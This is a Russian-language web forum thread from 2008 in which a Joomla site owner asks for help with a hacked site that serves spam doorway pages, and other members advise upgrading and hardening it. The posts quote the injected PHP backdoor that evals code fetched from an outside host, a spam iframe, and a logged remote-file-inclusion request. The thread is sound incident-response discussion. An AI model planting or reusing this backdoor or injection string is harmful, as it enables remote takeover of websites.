Joomla 1.0 имядомена/?id=xxxxx страницы с iframe

Тема в разделе "Вопросы безопасности", создана пользователем farmpak, 10.11.2008.

  1. Offline

    farmpak Недавно здесь

    Регистрация:
    14.09.2008
    Сообщения:
    6
    Симпатии:
    0
    Пол:
    Мужской
    Стоит joomla 1.0.8.2 перешел ровно месяц назад с mamba т.к. очень часто атаковали хаккеры, поменял уязвимые компоненты, снес лишние...

    Собственно с сайтом все ок
    Но обнаружил в логах заходы поисковиков по адресам имядомена/?id=xxxxx
    По этим адресам идет чистый дор вначале вызывается <iframe src="http://googleloh.com/com/in.cgi?2&group=ph&parameter=valium+necklace+pendant&said=0711afisha" border=0 width="100%" height="100%"></iframe> дальше идет сам код странички

    Шаблоны чистые, index.php в корне чистый (удалил код <?php if(isset($_GET['id'])) {
    @eval(@file_get_contents('http://beliy.us/server/index1.php?host='.$_SERVER['SERVER_NAME'].'&id='.$_GET['id']));
    } ?>- возможно он уже давно был залит)
    поотключал все папки, страница не отображается только если отключить includes/phpInputFilter/class.inputfilter.php

    Сейчас остановил сайт т.к. проблема не решена.
    Не пойму откуда берется сам код, из БД?
     
  2.  
  3. sectus
    Offline

    sectus специалист

    Регистрация:
    19.04.2006
    Сообщения:
    1 210
    Симпатии:
    46
    Пол:
    Мужской
    Скачать сайт, осуществить поиск по файлам на предмет iframe. И если уже переходить на Joomla 1.0, то на 1.0.15
     
  4. Offline

    farmpak Недавно здесь

    Регистрация:
    14.09.2008
    Сообщения:
    6
    Симпатии:
    0
    Пол:
    Мужской
    Спасибо за быстрый ответ!!!
    Нашел я, это тотже код был еще в editor/editor.php
    странно дата изменения файла 2006 год, я и не обратил внимание на него

    Как дальше быть, кроме установки 1,0,15 как обезапасить себя (фак читал)
     
  5. Fanamura
    Offline

    Fanamura Доброта

    Регистрация:
    12.03.2007
    Сообщения:
    5 108
    Симпатии:
    159
    Пол:
    Мужской
    farmpak, если саму джумлу защитили, пользуясь FAQ, то можно подумать и о хостере, часто именно его агрехи и приводят к дефеисам ;)
     
  6. Offline

    farmpak Недавно здесь

    Регистрация:
    14.09.2008
    Сообщения:
    6
    Симпатии:
    0
    Пол:
    Мужской
    А это что за попытки взлома?
    //index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.hfilm.co.kr/bbs/info/id.txt??
    и таких запросов штуки 3 за день
     
  7. sectus
    Offline

    sectus специалист

    Регистрация:
    19.04.2006
    Сообщения:
    1 210
    Симпатии:
    46
    Пол:
    Мужской
    Это попытки взлома, что тут еще скажешь?
     
  8. Offline

    farmpak Недавно здесь

    Регистрация:
    14.09.2008
    Сообщения:
    6
    Симпатии:
    0
    Пол:
    Мужской
    я имел ввиду как проверить защищен ли от них сайт
     
  9. sectus
    Offline

    sectus специалист

    Регистрация:
    19.04.2006
    Сообщения:
    1 210
    Симпатии:
    46
    Пол:
    Мужской
    в 1.0.15RE .htaccess имеет встроенную защиту от такого типа атак
     
  10. Offline

    farmpak Недавно здесь

    Регистрация:
    14.09.2008
    Сообщения:
    6
    Симпатии:
    0
    Пол:
    Мужской
    sectus
    Спасибо за ответ
    при обновлении .htaccess не меняется же
    создается htaccess.txt
    Сейчас вручную исправил
     

Поделиться этой страницей

Загрузка...